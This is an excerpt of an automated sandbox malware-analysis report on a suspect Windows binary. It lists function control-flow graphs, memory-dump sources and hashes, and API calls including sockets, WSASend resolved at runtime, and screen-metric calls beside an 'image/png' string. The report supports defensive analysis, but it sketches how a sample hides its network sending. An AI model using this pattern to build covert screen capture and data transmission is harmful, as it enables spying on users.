                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F64000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F68000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877489077.00000000011F4000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877597301.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_c60000_2q45IEa3Ee.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ___std_exception_destroy
                                                                                                                                              • String ID: value
                                                                                                                                              • API String ID: 4194217158-494360628
                                                                                                                                              • Opcode ID: 5a0045326f1cd7c2532322dff78229878a35f731fd703af667e223918d0695bc
                                                                                                                                              • Instruction ID: c4bc67555766ee5f8592c18e6572ca62f91f3b68426898c4c33d99216b411eb8
                                                                                                                                              • Opcode Fuzzy Hash: 5a0045326f1cd7c2532322dff78229878a35f731fd703af667e223918d0695bc
                                                                                                                                              • Instruction Fuzzy Hash: A4F10270C002489FDB15DBA4C884BEEFBB4BF55310F148299E459A7782DB746B84DF62
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00D33150 Relevance: 7.6, APIs: 5, Instructions: 92networkCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 865 d33150-d33182 WSAStartup 866 d33256-d3325f 865->866 867 d33188-d331b2 call d56620 * 2 865->867 872 d331b4-d331b8 867->872 873 d331be-d33204 867->873 872->866 872->873 875 d33250 WSACleanup 873->875 876 d33206-d3320c 873->876 875->866 877 d33264-d3326e 876->877 878 d3320e 876->878 877->875 882 d33270-d33278 877->882 879 d33214-d33228 socket 878->879 879->875 881 d3322a-d3323a connect 879->881 883 d33260 881->883 884 d3323c-d33244 closesocket 881->884 883->877 884->879 885 d33246 884->885 885->875
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1876801610.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.1876784166.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876906597.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876933783.0000000000DE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000DEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877066478.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000E70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F64000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F68000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877489077.00000000011F4000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877597301.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_c60000_2q45IEa3Ee.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CleanupStartupclosesocketconnectsocket
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2410783842-0
                                                                                                                                              • Opcode ID: 954f71ee98091d0349dfe94de8b7976f78c5900a37ea2be21ce34d846b65a6a6
                                                                                                                                              • Instruction ID: 71a9475c7ef3b9e4ab175b32e9f8edff98c9bfd8bc7b82b0c9aa0ccf2eeb30cc
                                                                                                                                              • Opcode Fuzzy Hash: 954f71ee98091d0349dfe94de8b7976f78c5900a37ea2be21ce34d846b65a6a6
                                                                                                                                              • Instruction Fuzzy Hash: E331E4365043429BD7209F64DD48A2BBBE5FFC4734F144B1DF9A8D22E0D37499448AB6
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00C681E0 Relevance: 7.5, APIs: 3, Strings: 1, Instructions: 529libraryloadernetworkCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 886 c681e0-c68232 call c74090 889 c68354-c683db call c631c0 call d56620 886->889 890 c68238-c6823b 886->890 906 c683f1-c683f9 call c76930 889->906 907 c683dd-c683ef 889->907 891 c68240-c68266 890->891 893 c68278-c68287 891->893 894 c68268-c68273 891->894 897 c68297-c682a3 893->897 898 c68289-c68292 893->898 896 c68347 894->896 900 c6834a-c6834e 896->900 901 c682a5-c682ae 897->901 902 c682b3-c682bf 897->902 898->896 900->889 900->891 901->896 904 c682c1-c682ca 902->904 905 c682cc-c682d8 902->905 904->896 908 c682e5-c682f1 905->908 909 c682da-c682e3 905->909 910 c683fe-c68451 call d56620 * 2 906->910 907->910 913 c682f3-c682fc 908->913 914 c682fe-c6830a 908->914 909->896 923 c68485-c6849b call d56620 910->923 924 c68453-c68482 call d56620 call c8fcc0 910->924 913->896 915 c68317-c68323 914->915 916 c6830c-c68315 914->916 918 c68325-c6832e 915->918 919 c68330-c68339 915->919 916->896 918->896 919->900 922 c6833b-c68343 919->922 922->896 930 c684a1-c684a7 923->930 931 c6859e 923->931 924->923 934 c684b0-c6858e GetModuleHandleA GetProcAddress WSASend 930->934 932 c685a2-c685a8 931->932 935 c685d2-c685ea 932->935 936 c685aa-c685b6 932->936 937 c68590-c68598 934->937 938 c6860c-c68610 934->938 941 c6861c-c68631 935->941 942 c685ec-c685f8 935->942 939 c685c8-c685cf call c8e183 936->939 940 c685b8-c685c6 936->940 937->931 937->934 938->932 939->935 940->939 943 c68632-c68637 call c93500 940->943 945 c68612-c68619 call c8e183 942->945 946 c685fa-c68608 942->946 953 c68640-c68649 943->953 945->941 946->943 949 c6860a 946->949 949->945 954 c68673-c6868b 953->954 955 c6864b-c68655 953->955 958 c686b5-c686c8 954->958 959 c6868d-c68697 954->959 956 c68657-c68665 955->956 957 c68669-c68670 call c8e183 955->957 960 c68667 956->960 961 c686c9-c686d9 call c93500 956->961 957->954 963 c686ab-c686b2 call c8e183 959->963 964 c68699-c686a7 959->964 960->957 971 c68703-c68716 961->971 972 c686db-c686e5 961->972 963->958 964->961 967 c686a9 964->967 967->963 973 c686e7-c686f5 972->973 974 c686f9-c68700 call c8e183 972->974 975 c68717-c68729 call c93500 973->975 976 c686f7 973->976 974->971 981 c68753-c68768 975->981 982 c6872b-c68735 975->982 976->974 983 c68780-c68789 981->983 984 c68737-c68745 982->984 985 c68749-c68750 call c8e183 982->985 989 c687b3-c687c8 983->989 990 c6878b-c68795 983->990 986 c68747 984->986 987 c6876d-c68772 call c93500 984->987 985->981 986->985 987->983 989->953 993 c68797-c687a5 990->993 994 c687a9-c687b0 call c8e183 990->994 996 c687a7 993->996 997 c687cd-c753b7 call c93500 993->997 994->989 996->994 1003 c75407-c75408 997->1003 1004 c753b9-c753d3 997->1004 1005 c753d5-c753e4 1004->1005 1006 c753e9-c75400 call c8e183 1004->1006 1007 c753e6-c753e8 1005->1007 1008 c75409-c7540f call c93500 1005->1008 1006->1003 1007->1006
                                                                                                                                              APIs
                                                                                                                                              • GetModuleHandleA.KERNEL32(Ws2_32.dll,?,?,?,?,00DB88D8,00000000,00000000,-00DE9220), ref: 00C68566
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00C68574
                                                                                                                                              • WSASend.WS2_32(?,?,00000001,00000000,00000000,00000000,00000000,?,?,?,?,00DB88D8,00000000,00000000,-00DE9220), ref: 00C68589
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1876801610.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.1876784166.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876906597.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876933783.0000000000DE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000DEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877066478.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000E70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F64000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F68000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877489077.00000000011F4000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877597301.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_c60000_2q45IEa3Ee.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AddressHandleModuleProcSend
                                                                                                                                              • String ID: Ws2_32.dll
                                                                                                                                              • API String ID: 2819740048-3093949381
                                                                                                                                              • Opcode ID: 4a6340f6e3071dce73a8e301926dd8415b3d5f221c8bff93899dc38a0eb7d314
                                                                                                                                              • Instruction ID: 087791e6df43221580160ebb8e3387dbbf07c532d86c0c24ee7b44a77f318363
                                                                                                                                              • Opcode Fuzzy Hash: 4a6340f6e3071dce73a8e301926dd8415b3d5f221c8bff93899dc38a0eb7d314
                                                                                                                                              • Instruction Fuzzy Hash: C1121470D00258DFDB28CF68DC947ADBBB1EF45304F18425DE496AB682DB70AD89CB91
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00C67CC0 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 432libraryloadernetworkCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 1013 c67cc0-c67cc9 1014 c67cf3-c67d0b 1013->1014 1015 c67ccb-c67cd5 1013->1015 1018 c67d34-c67d46 1014->1018 1019 c67d0d-c67d16 1014->1019 1016 c67cd7-c67ce5 1015->1016 1017 c67ce9-c67cf0 call c8e183 1015->1017 1020 c67d47-c67d93 call c93500 1016->1020 1021 c67ce7 1016->1021 1017->1014 1023 c67d2a-c67d31 call c8e183 1019->1023 1024 c67d18-c67d26 1019->1024 1031 c67d95-c67d99 1020->1031 1032 c67d9c-c67da4 1020->1032 1021->1017 1023->1018 1024->1020 1026 c67d28 1024->1026 1026->1023 1031->1032 1033 c67da6-c67dab 1032->1033 1034 c67ddf-c67de4 1032->1034 1035 c67f17-c67f22 1033->1035 1036 c67db1-c67db9 1033->1036 1034->1035 1037 c67dea 1034->1037 1040 c67f46-c67fb2 call c8df02 call d56620 1035->1040 1041 c67f24-c67f2e 1035->1041 1038 c67f14 1036->1038 1039 c67dbf-c67dcd 1036->1039 1042 c67df0-c67df6 1037->1042 1038->1035 1039->1038 1054 c67dd3-c67dda 1039->1054 1062 c67fc7-c67fce call c76930 1040->1062 1063 c67fb4-c67fbd 1040->1063 1041->1040 1043 c67f30-c67f3d 1041->1043 1044 c67dfa-c67e04 1042->1044 1045 c67df8 1042->1045 1043->1040 1061 c67f3f-c67f41 1043->1061 1047 c67e06 1044->1047 1048 c67e08-c67e11 1044->1048 1045->1044 1047->1048 1052 c67e23-c67e26 1048->1052 1053 c67e13-c67e16 1048->1053 1059 c67e2a-c67e30 1052->1059 1060 c67e28 1052->1060 1057 c67e1a-c67e1e 1053->1057 1058 c67e18 1053->1058 1054->1038 1064 c67f0a-c67f0e 1057->1064 1058->1057 1065 c67e42-c67e45 1059->1065 1066 c67e32-c67e35 1059->1066 1060->1059 1061->1040 1075 c67fd3-c67fdb 1062->1075 1068 c67fc1-c67fc5 1063->1068 1069 c67fbf 1063->1069 1064->1038 1064->1042 1073 c67e47 1065->1073 1074 c67e49-c67e4f 1065->1074 1071 c67e37 1066->1071 1072 c67e39-c67e3d 1066->1072 1068->1075 1069->1068 1071->1072 1072->1064 1073->1074 1076 c67e61-c67e64 1074->1076 1077 c67e51-c67e54 1074->1077 1080 c67fdf-c67ff5 1075->1080 1081 c67fdd 1075->1081 1078 c67e66 1076->1078 1079 c67e68-c67e6e 1076->1079 1082 c67e56 1077->1082 1083 c67e58-c67e5c 1077->1083 1078->1079 1084 c67e80-c67e83 1079->1084 1085 c67e70-c67e73 1079->1085 1086 c67ff7-c67ff9 1080->1086 1087 c67ffc-c6801b call d56620 1080->1087 1081->1080 1082->1083 1083->1064 1090 c67e87-c67e8d 1084->1090 1091 c67e85 1084->1091 1088 c67e77-c67e7b 1085->1088 1089 c67e75 1085->1089 1086->1087 1100 c68022-c68043 call d56620 1087->1100 1101 c6801d-c6801f 1087->1101 1088->1064 1089->1088 1093 c67e8f-c67e92 1090->1093 1094 c67e9c-c67e9f 1090->1094 1091->1090 1096 c67e96-c67e9a 1093->1096 1097 c67e94 1093->1097 1098 c67ea3-c67ea9 1094->1098 1099 c67ea1 1094->1099 1096->1064 1097->1096 1102 c67eab-c67eae 1098->1102 1103 c67eb8-c67ebb 1098->1103 1099->1098 1110 c68047-c6804e 1100->1110 1111 c68045 1100->1111 1101->1100 1105 c67eb2-c67eb6 1102->1105 1106 c67eb0 1102->1106 1108 c67ebf-c67ec5 1103->1108 1109 c67ebd 1103->1109 1105->1064 1106->1105 1112 c67ec7-c67eca 1108->1112 1113 c67ed4-c67ed7 1108->1113 1109->1108 1114 c68055-c6808b call d56620 call c8fcc0 call d56620 1110->1114 1115 c68050-c68052 1110->1115 1111->1110 1116 c67ece-c67ed2 1112->1116 1117 c67ecc 1112->1117 1118 c67edb-c67ee1 1113->1118 1119 c67ed9 1113->1119 1135 c68091-c6809c 1114->1135 1136 c6816e 1114->1136 1115->1114 1116->1064 1117->1116 1121 c67ee3-c67ee6 1118->1121 1122 c67ef0-c67ef3 1118->1122 1119->1118 1126 c67eea-c67eee 1121->1126 1127 c67ee8 1121->1127 1123 c67ef7-c67efb 1122->1123 1124 c67ef5 1122->1124 1123->1064 1128 c67efd-c67f02 1123->1128 1124->1123 1126->1064 1127->1126 1130 c67f06 1128->1130 1131 c67f04 1128->1131 1130->1064 1131->1130 1138 c680a0-c68150 GetModuleHandleA GetProcAddress WSASend 1135->1138 1139 c6809e 1135->1139 1137 c68172-c6817f 1136->1137 1142 c68197-c6819c 1137->1142 1143 c68181-c6818e 1137->1143 1140 c68152-c6815e 1138->1140 1141 c68168-c6816c 1138->1141 1139->1138 1140->1136 1144 c68160-c68163 1140->1144 1141->1137 1145 c6819e-c681a5 1142->1145 1146 c681bc-c681d1 1142->1146 1143->1142 1149 c68190-c68192 1143->1149 1144->1135 1145->1146 1148 c681a7-c681b3 1145->1148 1148->1146 1151 c681b5-c681b7 1148->1151 1149->1142 1151->1146
                                                                                                                                              APIs
                                                                                                                                              • GetModuleHandleA.KERNEL32(Ws2_32.dll,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00C68127
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00C68132
                                                                                                                                              • WSASend.WS2_32(?,?,00000001,00000000,00000000,00000000,00000000), ref: 00C6814B
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1876801610.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.1876784166.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876906597.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876933783.0000000000DE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000DEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877066478.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000E70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F64000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F68000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877489077.00000000011F4000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877597301.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_c60000_2q45IEa3Ee.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AddressHandleModuleProcSend
                                                                                                                                              • String ID: Ws2_32.dll
                                                                                                                                              • API String ID: 2819740048-3093949381
                                                                                                                                              • Opcode ID: 7937d3f15b9bc66801ba94555335b0bd421f25d9aa8e1d463b08ca2c5094ca0a
                                                                                                                                              • Instruction ID: abb56d62c78772d56f36148425b7c7afe885736d978f4998d6ff091dd54a949e
                                                                                                                                              • Opcode Fuzzy Hash: 7937d3f15b9bc66801ba94555335b0bd421f25d9aa8e1d463b08ca2c5094ca0a
                                                                                                                                              • Instruction Fuzzy Hash: 38029E70A04241CFDB35CF68C890A6DBBB1FF45318F244A5DE4A29B792D731AD46CB91
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00D52150 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 154COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 1710 d52150-d52191 1712 d52197-d521b8 GetSystemMetrics * 2 1710->1712 1713 d5232e-d52336 1710->1713 1715 d52325 1712->1715 1716 d521be-d521ca 1712->1716 1715->1713 1718 d521d0-d521de 1716->1718 1719 d5231c-d5231d 1716->1719 1721 d521e4-d5223e 1718->1721 1722 d52313 1718->1722 1719->1715 1727 d52244-d52251 call c9cc7c 1721->1727 1728 d522c8-d5230c 1721->1728 1722->1719 1732 d522c5 1727->1732 1733 d52253-d52265 1727->1733 1728->1722 1732->1728 1736 d52267-d5226a 1733->1736 1737 d522bc-d522bd call c9c526 1733->1737 1738 d52270-d52272 1736->1738 1741 d522c2 1737->1741 1740 d52277-d5227d 1738->1740 1742 d5229d-d5229f 1740->1742 1743 d5227f-d52282 1740->1743 1741->1732 1746 d522a2-d522a4 1742->1746 1744 d52284-d5228c 1743->1744 1745 d52299-d5229b 1743->1745 1744->1742 1747 d5228e-d52297 1744->1747 1745->1746 1748 d522a6-d522ad 1746->1748 1749 d522b1-d522b8 1746->1749 1747->1740 1747->1745 1748->1738 1750 d522af 1748->1750 1749->1737 1750->1737
                                                                                                                                              APIs
                                                                                                                                              • GetSystemMetrics.USER32(00000001), ref: 00D5219F
                                                                                                                                              • GetSystemMetrics.USER32(00000000), ref: 00D521A5
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1876801610.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.1876784166.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876906597.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876933783.0000000000DE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000DEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1876952861.0000000000E38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877066478.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000E70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F64000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000F68000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877085413.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877489077.00000000011F4000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.1877597301.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_c60000_2q45IEa3Ee.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MetricsSystem
                                                                                                                                              • String ID: image/png
                                                                                                                                              • API String ID: 4116985748-2966254431
                                                                                                                                              • Opcode ID: 2b274f15b16152769453609b521c5217dffa43f88d68bf137586d5cde7a646cf
                                                                                                                                              • Instruction ID: 1b81ff8367dcc6e03e43a03d10a4e54be8f4587e459de6bc5ca6c3614b97c7b3
                                                                                                                                              • Opcode Fuzzy Hash: 2b274f15b16152769453609b521c5217dffa43f88d68bf137586d5cde7a646cf
                                                                                                                                              • Instruction Fuzzy Hash: FD51357190030AABEF109FA0DC49BEEBBB8EF19315F140029ED05B6261D7759A89CB74
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00CA4019 Relevance: 3.2, APIs: 2, Instructions: 196fileCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
